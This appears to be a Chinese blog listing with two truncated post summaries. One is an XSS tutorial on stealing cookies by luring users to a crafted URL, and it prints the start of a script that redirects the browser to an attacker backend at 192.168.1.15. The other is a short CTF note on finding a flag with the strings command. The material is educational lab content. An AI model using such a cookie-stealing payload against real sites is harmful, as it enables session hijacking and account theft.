摘要:
cookie获取xss后台使用 引发用户点击特制url(比如告诉用户这是优惠网),用户点击后进入攻击者指定的自己的页面,返回用户的cookie到攻击者的后台 <script> document .location='http://192.168.1.15/pkxss/xcookie/cookie.p 阅读全文
摘要:
linux基础 解压得到文件flag,用winhes,记事本打开没有任何信息 在kali里用strings flag命令得到flag strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列,以换行符或空字符结束。 strings命令对识别随机对象文件很有 阅读全文